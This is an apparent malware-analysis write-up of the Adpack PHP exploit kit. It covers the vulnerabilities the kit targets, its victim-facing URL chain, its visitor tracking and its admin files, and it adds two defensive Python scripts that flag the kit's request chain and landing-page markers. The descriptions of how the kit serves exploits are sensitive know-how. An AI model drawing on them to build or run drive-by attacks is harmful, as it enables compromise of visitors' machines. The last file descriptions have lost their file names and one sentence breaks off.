Adpack stands for "Advanced Pack". It is written in PHP on the server side, with a SQL backend for tracking and statistics.
Analysis was performed on a toolkit which had file timestamps of September 2007.
The pack attempts to exploit the following vulnerabilities:
- MS06-014 (MDAC)
- Java ByteVerify
- Opera 9 (?)
URLs as seen by the victim:
- "index.php?java" - returns the HTML page that loads the Java applet.
- "java.php" - returns a JAR archive for the Java exploit.
- "load.php" - returns an Executable file (default: "load.exe").
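The three URLs above form a fixed chain (landing page, then "index.php?java", then the JAR, then the executable), which is what a defender can look for in proxy logs. The script below, an added example rather than code from the kit or from this analysis, rebuilds that chain per client IP and flags clients that fetched the executable after an earlier stage. The five-field log format (client IP, method, URL, status, response content type), every log line and the host name "adpack.example" are constructed.

```python
"""Reconstruct the Adpack request chain per client from proxy log lines.

Added example for this analysis, not code from the Adpack kit or from the
original write-up.  The five-field log format (client IP, method, URL, HTTP
status, response content type) and every log line below are constructed; the
host name "adpack.example" is a placeholder.
"""
from collections import defaultdict
from urllib.parse import parse_qs, urlparse


def stage_of(url, content_type):
    """Map one request to its stage in the chain, or None if unrelated.

    Order of stages: index.php (landing) -> index.php?java (java_page)
    -> java.php (java_jar) -> load.php (payload).  load.php only counts as
    the payload stage when the response really is "application/octet-stream";
    the kit answers a failed INSERT with a plain text string instead.
    """
    u = urlparse(url)
    script = u.path.rsplit("/", 1)[-1]
    if script == "index.php":
        query = parse_qs(u.query, keep_blank_values=True)
        return "java_page" if "java" in query else "landing"
    if script == "java.php":
        return "java_jar"
    if script == "load.php" and content_type == "application/octet-stream":
        return "payload"
    return None


def parse_line(line):
    """Split one constructed log line: ip method url status content-type."""
    ip, method, url, status, ctype = line.split()
    return ip, method, url, int(status), ctype


def chains_by_client(lines):
    """Return {client_ip: [stages in the order seen]} for related requests."""
    chains = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ip, _method, url, status, ctype = parse_line(line)
        if status != 200:
            continue
        stage = stage_of(url, ctype)
        if stage is not None:
            chains[ip].append(stage)
    return dict(chains)


def likely_compromised(lines):
    """Clients that fetched the executable after an earlier stage of the chain.

    A lone load.php download is not enough on its own: an earlier index.php
    or java.php request from the same client should precede it.
    """
    flagged = []
    for ip, stages in chains_by_client(lines).items():
        seen = set(stages)
        if "payload" in seen and seen & {"landing", "java_page", "java_jar"}:
            flagged.append(ip)
    return sorted(flagged)


# Constructed sample: one full chain, one client whose second request was
# answered with a plain text response, and one unrelated request.
SAMPLE_LOG = """\
198.51.100.7 GET http://adpack.example/pack/index.php 200 text/html
198.51.100.7 GET http://adpack.example/pack/index.php?java 200 text/html
198.51.100.7 GET http://adpack.example/pack/java.php 200 application/java-archive
198.51.100.7 GET http://adpack.example/pack/load.php 200 application/octet-stream
203.0.113.9 GET http://adpack.example/pack/index.php 200 text/html
203.0.113.9 GET http://adpack.example/pack/index.php?java 200 text/plain
192.0.2.44 GET http://news.example/story.html 200 text/html
"""

if __name__ == "__main__":
    for ip, stages in chains_by_client(SAMPLE_LOG.splitlines()).items():
        print(ip, "->", " > ".join(stages))
    print("likely compromised:", likely_compromised(SAMPLE_LOG.splitlines()))
```

Matching on script name alone is deliberately loose, since the kit can be hosted under any directory; the per-client ordering, not the individual request, is what carries the signal.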
Details on server-side execution of the PHP scripts:

"load.php":
- Inserts the victim's IP address into the database under the compromised table ("ips2").
- If unable to INSERT, returns the plain text string: "ai siktir vee?".
- Increments the "loads" count.
- Returns the executable file ("load.exe") with MIME type "application/octet-stream".
"index.php":
- Serves the <applet> tag only if the pack is configured to serve the Java exploit, the URL parameter requests it, the IP address has already visited this script (i.e., it received the redirect), and the IP address has not yet been exploited.
- Inserts the IP address into the database under the visitors table ("ips"). If the IP address already exists, the insert will fail.
- Failure to INSERT aborts the script and returns the same string as for "load.php".
- Increments statistical counts for Browser, Operating System, and Country.
  The following browser strings are tracked:
  "MSIE 7", "MSIE", "Nav", "Lynx", "Bot", "Firefox", "Mozilla".
  The following Operating System strings are tracked:
  "Windows 95", "Windows NT 4", "Win 9x 4.9", "Windows 98", "Windows NT 5.0", "Linux",
  "SV1" (as WinXPsp2), "Windows NT 5.1", "Windows NT 5.2", "FreeBSD", "Gentoo", "Ubuntu"
  Uses the GeoIP library to identify the visitor's country.
- Stores the Referer's FQDN field and increments its count.
- By default the URL resides in the same directory as the "index.php" script and will be called
- If the Java exploit was requested, serves the HTML applet tag with the JAR archive as "java.php", the class to run as "BaaaaBaa.class", and a single parameter "url" whose value is the URL of the Executable.
- OR, if the browser is "MSIE", returns the obfuscated HTML page. Its HEAD contains a 3-second redirection timeout to the Java exploit URL ("index.php?java").
- OR, if the browser is "Opera", serves an Opera exploit which reconfigures a preference for the TN3270 handler to execute the downloaded Executable file.
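The two pages "index.php" hands out (the applet page and the MSIE redirect page) carry fixed markers: the JAR named "java.php", the class "BaaaaBaa.class", a single "url" applet parameter, and a 3-second refresh to "index.php?java". The scanner below is an added example, not code from the kit or from this analysis; it pulls those markers out of captured HTML with the standard-library parser. Both sample pages are constructed from the description above, and the host name "adpack.example" and the "/pack/" path are placeholders.

```python
"""Flag Adpack landing-page indicators in captured HTML responses.

Added example for this analysis, not code from the Adpack kit or from the
original write-up.  The two sample pages are constructed from the behaviour
described above; the host name "adpack.example" and the "/pack/" path are
placeholders.
"""
from html.parser import HTMLParser

# Indicators from the write-up: the JAR is served as "java.php", the applet
# class is "BaaaaBaa.class", the applet takes a single "url" parameter, and
# the MSIE page refreshes after 3 seconds to "index.php?java".
APPLET_ARCHIVE = "java.php"
APPLET_CLASS = "BaaaaBaa.class"
REDIRECT_TARGET = "index.php?java"
REDIRECT_SECONDS = "3"


class TagCollector(HTMLParser):
    """Collect <applet>, <param> and <meta http-equiv="refresh"> attributes."""

    def __init__(self):
        super().__init__()
        self.applets = []    # attribute dicts, one per <applet>
        self.params = {}     # <param name=...> -> value
        self.refreshes = []  # content attribute of each refresh <meta>

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "applet":
            self.applets.append(a)
        elif tag == "param" and "name" in a:
            self.params[a["name"].lower()] = a.get("value", "")
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.refreshes.append(a.get("content", ""))


def parse_refresh(content):
    """Split a refresh value such as "3;url=target" into (seconds, target)."""
    head, sep, tail = content.partition(";")
    if not sep:
        return head.strip(), ""
    tail = tail.strip()
    if tail.lower().startswith("url="):
        tail = tail[4:].strip().strip("'\"")
    return head.strip(), tail


def find_indicators(html):
    """Return the set of indicator names present in one HTML document."""
    tc = TagCollector()
    tc.feed(html)
    hits = set()
    for a in tc.applets:
        if a.get("archive", "").rsplit("/", 1)[-1] == APPLET_ARCHIVE:
            hits.add("applet_archive_java_php")
        if a.get("code", "") == APPLET_CLASS:
            hits.add("applet_class_baaaabaa")
    if tc.applets and tc.params.get("url"):
        hits.add("applet_param_url")
    for content in tc.refreshes:
        seconds, target = parse_refresh(content)
        if seconds == REDIRECT_SECONDS and target.endswith(REDIRECT_TARGET):
            hits.add("meta_refresh_3s_to_java")
    return hits


# Constructed samples modelled on the two pages the write-up describes.
SAMPLE_JAVA_PAGE = """<html><body>
<applet archive="java.php" code="BaaaaBaa.class" width="1" height="1">
  <param name="url" value="http://adpack.example/pack/load.php">
</applet>
</body></html>"""

SAMPLE_MSIE_PAGE = """<html><head>
<meta http-equiv="refresh" content="3;url=http://adpack.example/pack/index.php?java">
</head><body></body></html>"""

if __name__ == "__main__":
    for name, page in (("java", SAMPLE_JAVA_PAGE), ("msie", SAMPLE_MSIE_PAGE)):
        print(name, sorted(find_indicators(page)))
```

The MSIE page is described as obfuscated, so the refresh tag may be written with varying case, spacing or quoting; parse_refresh normalises those variants before comparing, while the applet attributes are matched on their decoded values rather than on raw text.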
Connects to the database as defined in "config.php".
Contains definitions for various functions which are used by the toolkit.
:) - contains a blind SQL Injection vulnerability.
Creates the necessary tables in the database. If the tables already exist they will be dropped.
Contains the Database configuration and credentials, the pack's admin credentials, the name of the Executable file,
and a Boolean toggle for the Java exploit.
Admin page which displays various statistics and allows the statistics to be reset.